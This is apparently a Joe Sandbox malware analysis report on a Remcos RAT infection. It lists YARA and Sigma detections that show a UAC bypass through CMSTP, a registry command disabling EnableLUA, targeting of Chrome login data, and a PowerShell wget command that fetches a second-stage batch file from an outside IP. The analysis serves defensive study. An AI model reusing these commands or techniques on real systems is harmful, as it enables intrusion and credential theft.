25.2.cmd.exe.55cfa8a.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
25.2.cmd.exe.55cfa8a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
28.2.explorer.exe.4e79b57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.explorer.exe.4e79b57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.4a20a8a.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.4a20a8a.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
28.2.explorer.exe.4e34a8a.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.explorer.exe.4e34a8a.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
15.2.DZIPR.exe.35b39ce.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.DZIPR.exe.35b39ce.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
25.2.cmd.exe.5ba00c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
25.2.cmd.exe.5ba00c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
25.2.cmd.exe.5ba00c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
25.2.cmd.exe.5ba00c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
25.2.cmd.exe.5ba00c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
25.2.cmd.exe.5ba00c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
23.2.explorer.exe.4d75a8a.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.explorer.exe.4d75a8a.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
27.2.explorer.exe.4bee757.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
27.2.explorer.exe.4bee757.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.55eea8a.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.55eea8a.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
15.2.DZIPR.exe.35b45ce.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.DZIPR.exe.35b45ce.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.54200c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
17.2.cmd.exe.54200c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.cmd.exe.54200c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.54200c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
17.2.cmd.exe.54200c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
17.2.cmd.exe.54200c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
25.2.cmd.exe.5615757.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
25.2.cmd.exe.5615757.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.5c400c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
21.2.cmd.exe.5c400c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
21.2.cmd.exe.5c400c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.5c400c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
21.2.cmd.exe.5c400c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
21.2.cmd.exe.5c400c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
21.2.cmd.exe.5634757.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.5634757.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.4a66757.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.4a66757.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
28.2.explorer.exe.4e7a757.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.explorer.exe.4e7a757.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
25.2.cmd.exe.5614b57.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
25.2.cmd.exe.5614b57.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
15.2.DZIPR.exe.356e901.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.DZIPR.exe.356e901.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
21.2.cmd.exe.5c400c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
21.2.cmd.exe.5c400c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
21.2.cmd.exe.5c400c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.5c400c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
21.2.cmd.exe.5c400c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
21.2.cmd.exe.5c400c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
21.2.cmd.exe.5633b57.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.5633b57.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
23.2.explorer.exe.4dbb757.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.explorer.exe.4dbb757.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.54200c8.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
17.2.cmd.exe.54200c8.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.cmd.exe.54200c8.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.54200c8.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
17.2.cmd.exe.54200c8.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
17.2.cmd.exe.54200c8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
27.2.explorer.exe.4ba8a8a.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
27.2.explorer.exe.4ba8a8a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
15.0.DZIPR.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 74 entries

Sigma Signatures

System Summary

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4304, TargetFilename: C:\Users\user\AppData\Roaming\ffo.bat

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3428, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 948, ProcessName: wscript.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4304, TargetFilename: C:\Users\user\AppData\Roaming\ffo.bat

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 3700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3428, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 948, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat, ProcessId: 4304, ProcessName: powershell.exe

Sigma detected: Proxy Execution Via Explorer.exe

Source: Process started

Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 4016, ProcessName: explorer.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3700, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\vqqcre	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\yigmovm	Avira: detection malicious, Label: BDS/Backdoor.Gen

Found malware configuration

Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack

